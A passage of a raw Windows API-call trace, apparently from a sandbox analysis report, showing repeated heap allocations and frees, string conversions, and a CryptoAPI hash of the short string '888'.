(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.775] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d78 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.775] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0268.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51dc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0268.776] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0268.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55108, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0268.777] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0268.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55028, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0268.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0268.778] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0268.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0268.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51c40 [0268.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51c40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.782] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.783] CryptHashData (hHash=0xa872d0, pbData=0x2e54f98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0268.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0268.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 